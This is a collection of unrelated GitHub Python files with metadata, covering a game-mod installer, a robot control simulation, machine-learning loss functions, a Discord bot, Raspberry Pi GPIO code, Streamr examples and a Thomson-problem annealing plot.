+{"seq_id":"2481939544","text":"import shutil\nimport pathlib\nfrom lib.utils import rm_rf\nfrom lib.recipes import Receipt\n\n\nclass adopted(Receipt):\n depends=[\"KOS\"]\n\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n\n def build(self):\n pass\n\n def can_install(self):\n return True\n\n def install(self):\n adopted_path = pathlib.Path().joinpath(\"adopted\").resolve()\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"XyphosAerospace\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"IndicatorLightsCommunityExtensions\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"IndicatorLightsCommunityExtensions\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"NFEOutdated\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"NFEOutdated\"), target_dir)\n\n def check_installed(self):\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n return target_dir.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/adopted.py","file_name":"adopted.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38245707427","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated on Tue Sep 15 10:37:53 2020\n\n@author: Guy\n\nImplements a dynamical system of a robot (double integrator) with a range sensor measuring\nits position relative to a wall. The measurements are not Normally distributed, but characterized\nwith the \"beam model\" (see \"Probablistic Robotics\" chapter 6). The aim is to see the reachable \nsets of the system under given controls and this noise.\n\"\"\"\n\n# general stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as spi\nimport scipy.interpolate as interpolate\nfrom scipy import stats\n\n#try:\n#\tfrom pydrake.all import LinearQuadraticRegulator\n#except:\n#\t# newer version of drake\nfrom pydrake.systems.controllers import LinearQuadraticRegulator\n\n# my helper classes\nfrom map_generator import MapGenerator\n\n# some behavioral control switches\ncontinuous = False\n#'const', 'linear', 'saw', 'sine', 'square', 'file'\nMap = MapGenerator(north_type='square', south_type='saw', center_type='const')\n\n# parameters of simulation\nconst_velocity = 0.5 # in x direction [m/sec]\nm = 1.0 # robot mass [Kg]\ndt = 0.01 # integration step time [sec]\nTmax = 10 # simulation time [sec]\nmeas_max = 6.0 # max measurement of the range sensor [m]\n\n# vector of measurements\n#sensor_array = np.array([90.]) # array of angles with respect to the x axis\nsensor_array = np.array([90., -90.]) # array of angles with respect to the x axis\n#sensor_array = np.array([90., 45., -45., -90.]) # array of angles with respect to the x axis\n\n# estimator memory variables\nz_est = np.array([[0.], [0.]]) # y, y'\nu_est = 0.\n# check via matlab or place some algorithm here to calculate the gains for each (A,C)\n# A = [0 1; 0 0]\n# C = [-1/sin(a1) 0; -1/sin(a2) 0 ....]\n# p = -2*pi*1*[cosd(45)+i*sind(45), -cosd(45)-i*sind(45)]\n# L = place(A',C',p).'\n#L = np.array([[-8.89], [-39.48]]) # [+90]; w=1Hz, zeta=0.7\nL = np.array([[-4.44, 4.44], [-19.74, 19.74]]) # [+90,-90]; w=1Hz, zeta=0.7\n#L = np.array([[-2.96,-2.10,2.10,2.96], [-13.16,-9.31,9.31,13.16]]) # [+90,+45,-45,-90]; w=1Hz, zeta=0.7\n\n# wall y location with respect to x. 
y_dir =1 if north wall, y_dir=-1 if south\ndef wall_y_location(x, y_dir=1.):\n\tif(y_dir > 0.):\n\t\treturn Map.north_wall(x)\n\telse:\n\t\treturn Map.south_wall(x)\n\n# state z has three components: z=[x, y, y'].\ndef plant(z, t):\n\tN_sensors = sensor_array.shape[0]\n\tmeas = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\t# state feedback control (on y-position) is the distance to the wall\n\t\tideal_y = wall_y_location(z[0], y_dir=north_wall) - z[1]\n\t\tif(np.abs(sensor) <= 0.001):\n\t\t\t# case where there is a sensor heading in x direction\n\t\t\t# assume infinite wall so no wall is infront\n\t\t\tmeas[i][0] = meas_max\n\t\telse:\n\t\t\t# get the ideal ray to the wall\n\t\t\tideal_meas= ideal_y / np.sin(np.deg2rad(sensor))\n\t\t\t# get the new noise distribution (because it varies with the nominal meas.)\n\t\t\tpdf, bins = noise_dist(ideal_meas, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1)\n\t\t\t# only Gaussian noise (for debug)\n\t\t\t# pdf, bins = noise_dist(ideal_meas, a1=.3, a2=0., a3=0., a4=0., norm_sig=0.1)\n\t\t\t# sample a new measurement from the inverse cdf using a uniform random number in [0,1]\n\t\t\tmeas[i][0] = inverse_transform_sampling(pdf, bins) \n\n\t# output feedback control\n\tu = control(Map.center_line(z[0]), meas, z[0])\n\t\n\t'''\n\t# discretized\n zdot[0] = z[0] + 0 + 0 + dt * const_velocity\n zdot[1] = 0 + z[1] + dt * z[2] + dt*dt/(2.*m) * u\n\tzdot[2] = 0 + 0 + z[2] + dt/m * u\n\t'''\n\tzdot = z.copy()\n\tzdot[0] = const_velocity # x' = v_const\n\tzdot[1] = z[2] # y' = y'\n\tzdot[2] = 1./m * u # m*y'' = u\n\t\n # We return z'=[x', y', y''] and measured output y\n\treturn zdot, meas\n\n# state estimation (pole placement) + state feedback (LQR). \n#ref- y to be in. meas- the measurements vector. x- just for the wall function\ndef control(ref, meas, x):\n\tglobal z_est\n\tglobal u_est\n\tglobal L\n\t\n\t# observer gain (only for 1 measurement, if you have more, compute in matlab).\n\t#wn = 2.*np.pi*1. 
# 1Hz observer\n\t#xi = 0.7 # damping factor\n\t#LL = np.array([[-2.*xi*wn], [-wn*wn]]) # pole-placement\n\t\n\t# create the range estimation for each sensor\n\tN_sensors = meas.shape[0]\n\tmeas_est = np.zeros( [N_sensors, 1] )\n\tfor i, sensor in enumerate(sensor_array):\n\t\tnorth_wall = 1.0 \n\t\tif sensor < 0.:\n\t\t\tnorth_wall = -1.0\n\t\ty_est = wall_y_location(x, y_dir=north_wall) - z_est[0][0]\n\t\tif(np.abs(sensor) < 0.001):\n\t\t\tmeas_est[i][0] = np.inf\n\t\telse:\n\t\t\tmeas_est[i][0] = y_est / np.sin(np.deg2rad(sensor))\n\t\t\n\t# Luenberger Observer\n\tf = np.array([[z_est[1][0]], \\\n\t\t\t\t [1./m * u_est] ])\n\t# Estimator equations\n\tzdot_est = f + L.dot(meas - meas_est)\n\t# Euler integration\n\tz_est = z_est + dt * zdot_est\n\t\n\t# now we can do state feedback control (x-axis doesn't really play here)\n\tAf = np.array([[0.,1.], [0.,0.]])\n\tBf = np.array([[0.], [1./m]])\n\tQ = np.eye(2)\n\tR = np.eye(1)\n\tKf, Qf = LinearQuadraticRegulator(Af, Bf, Q, R)\n\t\n\tu_est = ref - Kf.dot(z_est)[0][0]\n\t# do nothing (for debug)\n\t#u_est = 0.\n\t\n\treturn u_est\n\n# implements the noise pdf of the beam model and allows some parameters to be set\ndef noise_dist(x_true, a1=1., a2=1., a3=1., a4=.1, norm_sig=1., exp_lambda=1., uni_delta=0.5, plot=False):\n\tN = 100\n\t\n\t# the discretization of the space (bins)\n\tx = np.linspace(0, meas_max, N)\n\t# -x_true because we shift it and for some reason it looks at the truncated dist before shift :(\n\trv_norm = stats.truncnorm(-x_true, meas_max-x_true, loc=x_true, scale=norm_sig) \n\trv_exp = stats.expon()\n\trv_uni = stats.uniform()\n\t\n\t# the beam model pdf (see prob. robotics book ch. 6)\n\tpdf = a1 * rv_norm.pdf(x) + \\\n\t\t a2 * rv_exp.pdf(exp_lambda*x)*exp_lambda + \\\n\t\t a3 * rv_uni.pdf((x-0.)/meas_max)/meas_max + \\\n\t\t a4 * rv_uni.pdf((x-(meas_max-uni_delta))/uni_delta)/uni_delta\n\n\tif(plot):\n\t\t# plot the dist for debugging\n\t\tfig, ax = plt.subplots(1, 1)\n\t\tax.plot(x, pdf)\n\t\tplt.title('p(x) for the beam model')\n\t\tplt.show(block=False)\n\t\t\n\treturn pdf, x\n\n# both creates the inverse cdf and samples and returns numbers from this distribution\ndef inverse_transform_sampling(pdf, bin_edges, n_samples=1):\n\t#import pdb; pdb.set_trace()\n\t# this sort of creates the histogram by taking to adjacent pdf values and averaging them for every bin\n\tpdf = 0.5 * ( pdf[:-1] + pdf[1:] )\n\t# construct the CDF\n\tcum_values = np.zeros(bin_edges.shape)\n\tcum_values[1:] = np.cumsum(pdf*np.diff(bin_edges))\n\t# normalize to a standard distribution because it wasn't done before\n\tcum_values = cum_values/cum_values[-1] \n\t\n\tinv_cdf = interpolate.interp1d(cum_values, bin_edges)\n\t# u in [0,1]\n\tu = np.random.rand(n_samples)\n\t# return the function for later use\n\treturn inv_cdf(u)\n\ndef simulate_c():\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=Tmax.\n\tt = np.linspace(0., 10., Tmax)\n\t# The initial position is (0, 0).\n\tz0 = np.zeros(3)\n\t\n\t# We simulate the system and evaluate z\n\tz = spi.odeint(plant, z0, t, args=(k,))\n\t\n\treturn t, z\n\n# implements a standard Euler integration steps in a loop\ndef simulate_d():\n\tglobal z_est\n\tglobal u_est\n\tz_est = np.array([[0.], [0.]])\n\tu_est = 0.\n\t\n\t# We want to evaluate the system on N linearly spaced times between t=0 and t=10.\n\tt_vec = np.arange(0., Tmax, dt)\n\t# The initial position is (0, 0).\n\t#z = np.array([0., 0., 0.])\n\tz = np.array([0., 1., 0.])\n\tz_save, z_est_save, u_save, meas_save = [], 
[], [], []\n\t\n\tN_sensors = sensor_array.shape[0]\n\n\t# We simulate the system and evaluate z\n\tfor t in t_vec:\n\t\t# get the derivatives\n\t\tzdot, meas = plant(z, t)\n\t\t# Euler integration\n\t\tz = z + dt * zdot \n\t\t# save for telemetry\n\t\tif(len(z_save) == 0):\n\t\t\tz_save = np.array([z])\n\t\t\tz_est_save = np.array(z_est.reshape((1,2))) # only save y,y' at the moment\n\t\t\tmeas_save = np.array(meas.reshape((1,N_sensors)))\n\t\t\tu_save = np.array([u_est])\n\t\telse:\n\t\t\tz_save = np.vstack([z_save, z])\n\t\t\tmeas_save = np.vstack([meas_save, meas.reshape((1,N_sensors))])\n\t\t\tz_est_save = np.vstack([z_est_save, z_est.reshape((1,2))])\n\t\t\tu_save = np.vstack([u_save, u_est])\n\t\n\treturn t_vec, z_save, meas_save, z_est_save, u_save\n\ndef single_run():\n\tif(continuous):\n\t\tt, state = simulate_c()\n\telse:\n\t\tt, state, meas, state_est, controls = simulate_d()\n\n\t# plot the dist for debugging\n\t#pdf, bins = noise_dist(3.0, a1=.5, a2=0.1, a3=.3, a4=.04)\n\tpdf, bins = noise_dist(3.0, a1=.3, a2=0.1, a3=.1, a4=.04, norm_sig=0.1, plot=True)\n\n\t# visualizations\n\tfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n\tax1.plot(t, state[:, 1], label='$y(t)$')\n\tax1.plot(t, state_est[:, 0], label='$\\^y(t)$')\n\tax2.plot(t, controls[:], label='$u_y(t)$', alpha=0.2)\n\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0], y_dir=1.0) )\n\t\ts_wall.append( wall_y_location(state[i, 0], y_dir=-1.0 ) )\n\t\n\tfor i, sensor in enumerate(sensor_array):\n\t\tif sensor > 0.:\n\t\t\tax1.plot(t, n_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\t\telse:\n\t\t\tax1.plot(t, s_wall - meas[:,i]*np.sin(np.deg2rad(sensor)), \\\n\t\t\t\t\tlabel='$\\^y(sensor_%d)$'%i, marker='o', linestyle='', alpha=0.2)\n\n\t#ax.plot([t[0], t[-1]], [3., 3.], label='north wall', color='k', linewidth=6)\n\tax1.plot(t, n_wall, label='north wall', color='k', linewidth=6)\n\t#ax.plot([t[0], t[-1]], [-3., -3.], label='south wall', color='k', linewidth=6)\n\tax1.plot(t, s_wall, label='south wall', color='k', linewidth=6)\n\tax1.legend(loc='upper right')\n\tax1.set_title('state vs. time (%d sensors)'%(len(sensor_array)))\n\tax2.legend(loc='upper right')\n\tax2.set_title('controls vs. time')\n\tax1.set_xlim(t[0], t[-1])\n\tax1.set_ylim(-np.max(np.abs(n_wall)), np.max(np.abs(n_wall)))\n\t\n\tfig, ax3 = plt.subplots(1, 1)\n\tax3.plot(state[:, 0], state[:, 1], label='$robot$')\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend(loc='upper right')\n\tax3.set_title('Robot in workspace')\n\t\n\tplt.show() #block=True)\n\t\ndef multi_run(n=10):\n\t# visualizations\n\tfig, ax3 = plt.subplots(1, 1)\n\n\tfor idx in range(n):\n\t\tt, state, meas, state_est, controls = simulate_d()\n\t\tprint('finished run #%d' %(idx))\n\t\tax3.plot(state[:, 0], state[:, 1], label='$%d$'%(idx), alpha=0.2)\n\t\n\t# walls\n\tn_wall, s_wall = [], []\n\tfor i in range(len(t)):\n\t\tn_wall.append( wall_y_location(state[i, 0]) )\n\t\ts_wall.append( -3. 
)\n\tax3.plot(state[:, 0], n_wall, label='north wall', color='k', linewidth=6)\n\tax3.plot(state[:, 0], s_wall, label='south wall', color='k', linewidth=6)\n\tax3.legend()\n\tax3.set_title('Robot in workspace')\n\n\tplt.show()\n\n\nif __name__ == \"__main__\":\n\t\n\tsingle_run()\n\t#multi_run()\n","repo_name":"sguysc/Perception_verification","sub_path":"simulate_dbl_int_in_corridor_numpy.py","file_name":"simulate_dbl_int_in_corridor_numpy.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71566940843","text":"import dataclasses\nfrom typing import List\n\nimport einops\nimport jax.numpy as jnp\n\nfrom apax.utils.math import normed_dotp\n\n\ndef weighted_squared_error(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Squared error function that allows weighting of\n individual contributions by the number of atoms in the system.\n \"\"\"\n return (label - prediction) ** 2 / divisor\n\n\ndef force_angle_loss(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function. Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n return (1.0 - dotp) / divisor\n\n\ndef force_angle_div_force_label(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n):\n \"\"\"\n Consine similarity loss function weighted by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n loss = jnp.where(F_0_norm > 1e-6, (1.0 - dotp) / F_0_norm, jnp.zeros_like(dotp))\n return loss\n\n\ndef force_angle_exponential_weight(\n label: jnp.array, prediction: jnp.array, divisor: float = 1.0\n) -> jnp.array:\n \"\"\"\n Consine similarity loss function exponentially scaled by the norm of the force labels.\n Contributions are summed in `Loss`.\n \"\"\"\n dotp = normed_dotp(label, prediction)\n F_0_norm = jnp.linalg.norm(label, ord=2, axis=2, keepdims=False)\n return (1.0 - dotp) * jnp.exp(-F_0_norm) / divisor\n\n\nloss_functions = {\n \"molecules\": weighted_squared_error,\n \"structures\": weighted_squared_error,\n \"vibrations\": weighted_squared_error,\n \"cosine_sim\": force_angle_loss,\n \"cosine_sim_div_magnitude\": force_angle_div_force_label,\n \"cosine_sim_exp_magnitude\": force_angle_exponential_weight,\n}\n\n\n@dataclasses.dataclass\nclass Loss:\n \"\"\"\n Represents a single weighted loss function that is constructed from a `name`\n and a type of comparison metric.\n \"\"\"\n\n name: str\n loss_type: str\n weight: float = 1.0\n\n def __post_init__(self):\n if self.loss_type not in loss_functions.keys():\n raise NotImplementedError(\n f\"the loss function '{self.loss_type}' is not known.\"\n )\n\n if self.name not in [\"energy\", \"forces\", \"stress\"]:\n raise NotImplementedError(f\"the quantity '{self.name}' is not known.\")\n self.loss_fn = loss_functions[self.loss_type]\n\n def __call__(self, inputs: dict, prediction: dict, label: dict) -> float:\n # TODO we may want to insert an additional `mask` argument for this method\n divisor = self.determine_divisor(inputs[\"n_atoms\"])\n loss = self.loss_fn(label[self.name], prediction[self.name], divisor=divisor)\n return self.weight * jnp.sum(jnp.mean(loss, axis=0))\n\n def determine_divisor(self, n_atoms: jnp.array) -> jnp.array:\n divisor_id = self.name + \"_\" + self.loss_type\n divisor_dict = {\n \"energy_structures\": n_atoms**2,\n \"energy_vibrations\": n_atoms,\n \"forces_structures\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"cosine_sim_div_magnitude\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n \"forces_cosine_sim_exp_magnitude\": einops.repeat(\n n_atoms, \"batch -> batch 1 1\"\n ),\n \"stress_structures\": einops.repeat(n_atoms**2, \"batch -> batch 1 1\"),\n \"stress_vibrations\": einops.repeat(n_atoms, \"batch -> batch 1 1\"),\n }\n divisor = divisor_dict.get(divisor_id, 
jnp.array(1.0))\n\n return divisor\n\n\n@dataclasses.dataclass\nclass LossCollection:\n loss_list: List[Loss]\n\n def __call__(self, inputs: dict, predictions: dict, labels: dict) -> float:\n total_loss = 0.0\n for single_loss_fn in self.loss_list:\n loss = single_loss_fn(inputs, predictions, labels)\n total_loss = total_loss + loss\n\n return total_loss\n","repo_name":"apax-hub/apax","sub_path":"apax/train/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
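A small sketch of the weighting convention above; the values are illustrative, and only `weighted_squared_error` is exercised to keep it self-contained (constructing a `Loss` only validates its `name`/`loss_type`):

```python
import jax.numpy as jnp

# Per-element squared error scaled by a divisor, as used for per-atom weighting.
label = jnp.array([1.0, 2.0, 3.0])
prediction = jnp.array([1.5, 2.0, 2.0])
print(weighted_squared_error(label, prediction, divisor=3.0))  # [0.0833 0. 0.3333]

# Wiring it into the dataclasses above (weight is illustrative):
losses = LossCollection([Loss(name="energy", loss_type="structures", weight=1.0)])
```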
+{"seq_id":"18905115919","text":"# -*- coding: utf-8 -*-\r\n# Rodrigo - Prova 3, Area Inferior, 1188\r\nOperacao = str(input()) #Input da operação.\r\n\r\nsoma = 0 #Armazenará a soma dos elementos da matriz.\r\nM = [[' ']*12]*12 #Criação da matriz 12x12\r\nfor i in range(0, 12): #Dois For's que vão percorrer a matriz 12x12 e somar os elementos.\r\n for j in range(0, 12):\r\n M[i][j] = float(input())\r\n if (i >= 7) and (j <= i - 1) and (j >= 12 - i) and (i + j != 11) and (i != j): #Condição pra acessar só os elementos da área inferior.\r\n soma += M[i][j]\r\n\r\nmedia = soma / 144 #Média dos elementos da matriz.\r\n\r\nif Operacao == 'S': #Dependendo do input da operação, será impresso a soma ou a média na tela.\r\n print(f'{soma:.1f}')\r\nelif Operacao == 'M': \r\n print(f'{media:.1f}')","repo_name":"RodrigoSdeCarvalho/uri-online-judge","sub_path":"1188.py","file_name":"1188.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"20900985547","text":"import nextcord\nfrom nextcord import AllowedMentions, Interaction, SlashOption, ChannelType, ApplicationCheckFailure\nfrom nextcord.ext import commands, tasks, application_checks\nimport os\nfrom dotenv import load_dotenv\nfrom cooldowns import CallableOnCooldown\nimport logging\n\nlogger = logging.getLogger('nextcord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='nextcord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\nload_dotenv()\nTOKEN = os.getenv(\"TOKEN\")\nclient = commands.Bot(owner_ids=[482232269038288916])\n\n@client.event\nasync def on_ready():\n print(\"Bot hazır\")\n print(\"-----------------\")\n await client.change_presence(activity=nextcord.Game(name='asdfg'))\n\n@client.event\nasync def on_application_command_error(inter: nextcord.Interaction, error):\n error = getattr(error, \"original\", error)\n if isinstance(error, CallableOnCooldown):\n em = nextcord.Embed(color=0xff0000, title=\"**Fazla hızlısın!** :x:\", description=f\"{error.retry_after} saniye sonra tekrar dene.\")\n await inter.send(embed=em, ephemeral=True)\n elif isinstance(error, ApplicationCheckFailure):\n em = nextcord.Embed(color=0xff0000, title=\"**Error!** :x:\", description=f\"No permissions.\")\n await inter.send(embed=em, ephemeral=True)\n else:\n raise error\n\nfor fn in os.listdir(\"./cogs\"):\n if fn.endswith(\".py\"):\n client.load_extension(f\"cogs.{fn[:-3]}\")\n else:\n pass\n\n@client.slash_command(\n name=\"cog\"\n)\n@application_checks.is_owner()\nasync def cog(interaction: nextcord.Interaction):\n pass\n@cog.subcommand()\n@application_checks.is_owner()\nasync def load(interaction: nextcord.Interaction, extension: str):\n client.load_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yüklendi!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def unload(interaction: nextcord.Interaction, extension: str):\n client.unload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog durduruldu!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def reload(interaction: nextcord.Interaction, extension: str):\n client.reload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yeniden yüklendi!\")\n\nclient.run(TOKEN)","repo_name":"JustBurakk/ahmetbot","sub_path":"ahmet-main.py","file_name":"ahmet-main.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39768941455","text":"#define two lists\r\na = [1,1,2,3,5,8,13,21,34,55,89]\r\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13]\r\n\r\n#define an empty list for storing shared values\r\nc = []\r\n\r\n#iterate through one of the lists and check for each element whether it's a shared value or not\r\n'''it checks whether the length of the list is greater than zero because we remove all elements that are\r\nequal to the current element (including that element) in order to avoid duplicates'''\r\nwhile len(a)>0:\r\n\r\n #we always take the first element because after removing the previous element we end up with the next element\r\n #being in the index 0\r\n i = a[0]\r\n\r\n #check whether it exists in the other list as well\r\n if b.count(i)>0:\r\n\r\n #add it to the list of shared elements\r\n c.append(i)\r\n\r\n #remove all values equal to i form the first list in order to avoid duplicates\r\n for j in range(a.count(i)):\r\n a.remove(i)\r\n\r\nprint(c)\r\n","repo_name":"georgead01/TA_EXAM","sub_path":"second_question.py","file_name":"second_question.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37872359720","text":"import RPi.GPIO as GPIO\nimport time\n\ndef waitForSafety():\n #pin numbers\n sensor = 21\n led = 18\n button = 15\n\n #set up all the pins\n GPIO.setmove(GPIO.BCM)\n GPIO.setup(sensor, GPIO.IN)\n GPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #required for button usage\n GPIO.setup(led, GPIO.OUT)\n\n GPIO.output(led, False) #start with LED off\n print(\"Performing safety checks...\")\n print(\" \")\n\n while True:\n if (not GPIO.input(sensor)) and GPIO.input(button) == GPIO.HIGH:\n GPIO.output(led, True)\n print('Safety checks complete. Starting in 3s.')\n time.sleep(3)\n GPIO.cleanup()\n break\n else:\n GPIO.output(led, False)","repo_name":"shreyapatill/ecehonorslab","sub_path":"RubiksSolver/sensor_led_output.py","file_name":"sensor_led_output.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38392495428","text":"from typing import List\n\nimport pytest\n\nfrom StudyNotes.TestDevelopHomework.PhaseThreeHomework.CounterDemo.Counter import CounterDemoTest\n\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n\n\n@pytest.fixture(scope=\"class\")\ndef counterBegin():\n print(\"开始计算\")\n # 实例化CounterDemo类\n counterDemoTest = CounterDemoTest()\n yield counterDemoTest\n\n print(\"计算结束\")","repo_name":"Zuoxixian/TESTDEVELOP","sub_path":"StudyNotes/TestDevelopHomework/PhaseThreeHomework/TestCounterDemo/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"25921571963","text":"\"\"\"\nan example of create and get stream\n\"\"\"\n\n\nfrom streamr import Client, Option\n\n# To create or get a stream you should create a client object at first\nmy_option = Option.get_default_option()\nmy_option.api_key = 'your-api-key'\n\nmy_client = Client(my_option)\n\n# To create a new stream, you can use 'create_stream' or 'get_or_create_stream' with a 'name' parameter\n# Note that create_stream is running forcefully.\n# That means you can create two stream with same name but the stream_ids are different\n\n\nstream1 = my_client.create_stream('stream-test-1')\n\nstream2 = my_client.get_or_create_stream('stream-test-2')\n\n# To get a stream, you can use 'get_stream_by_name' or get_stream_by_id' method\n\n# get_stream_by_name will return all the streams with steam name\n# the return is a list object containing the information of all streams\nstream3 = my_client.get_stream_by_name('stream-test-2')\n\n# get stream by id will return the stream with the stream_id\n# the return is a dictionary containing the information of the stream\n# Before using this methods, you should replace the stream_id with a 32 bytes strings, which\n# can be found in the stream page, also can be obtained using the get_stream_by_name method.\nstream_id = stream2[0]['id']\nstream4 = my_client.get_stream_by_id(stream_id)\n","repo_name":"streamr-dev/streamr-client-python","sub_path":"examples/createOrGetStream.py","file_name":"createOrGetStream.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"16992563670","text":"import matplotlib\nmatplotlib.use('QtAgg')\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom scipy.optimize import dual_annealing\n\ndef polar_to_cartesian(m):\n return np.array([\n np.sin(m[0]) * np.cos(m[1]),\n np.sin(m[0]) * np.sin(m[1]),\n np.cos(m[0])\n ])\n\ndef filter_indexes(x):\n return np.any(x[0] < x[1])\n\n\nclass Thomson(object):\n def __init__(self) -> None:\n self.nb_call = 0\n self.best_value = np.inf\n\n def objective(self, x):\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n\n def rdist_fun(x):\n return np.array(\n 1 / np.sqrt(np.sum(\n (y_mat[x[0]] - y_mat[x[1]])** 2))\n )\n\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n seq_vec = np.arange(0, x_mat.shape[0])\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n rdist = np.apply_along_axis(rdist_fun, axis=1, arr=indexes)\n fvalue = np.sum(rdist)\n if fvalue < self.best_value:\n self.best_value = fvalue\n update_plot(x, fvalue, self.nb_call, self.best_value, better=True)\n else:\n update_plot(x, fvalue, self.nb_call, self.best_value, better=False)\n self.nb_call +=1 \n return fvalue\n\n\nn_particles = 12\nlw = np.array([0] * (n_particles * 2))\nup = np.concatenate((\n np.repeat(np.pi, n_particles),\n np.repeat(2 * np.pi, n_particles)), axis=None)\nbounds=list(zip(lw, up))\n\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\nu, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:20j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\ndef init_sphere():\n ax.plot_wireframe(x, y, z, color=\"grey\", linewidth=0.2)\n ax.plot_surface(x, y, z, color=\"g\", alpha=0.1)\n return fig,\n\ndef update_plot(x, f, nb_call, best_value, better):\n ax.view_init(elev=20, azim=nb_call % 360 )\n ax.set_title(f'Nb function call: {nb_call} Energy: {best_value:.6f}')\n if better:\n plt.cla()\n init_sphere()\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n for i in range(n_particles):\n ax.scatter(y_mat[i, 0], y_mat[i, 1], y_mat[i, 2])\n seq_vec = np.arange(0, n_particles)\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n for i in range(indexes.shape[0]):\n ax.plot(\n [\n y_mat[indexes[i, 0], 0],\n y_mat[indexes[i, 1], 0],\n ],\n [\n y_mat[indexes[i, 0], 1],\n y_mat[indexes[i, 1], 1],\n ],\n [\n y_mat[indexes[i, 0], 2],\n y_mat[indexes[i, 1], 2],\n ], linewidth=0.9,\n )\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ion()\ninit_sphere()\nax.view_init(elev=20, azim=(90))\nthomson = Thomson()\nres = dual_annealing(thomson.objective, 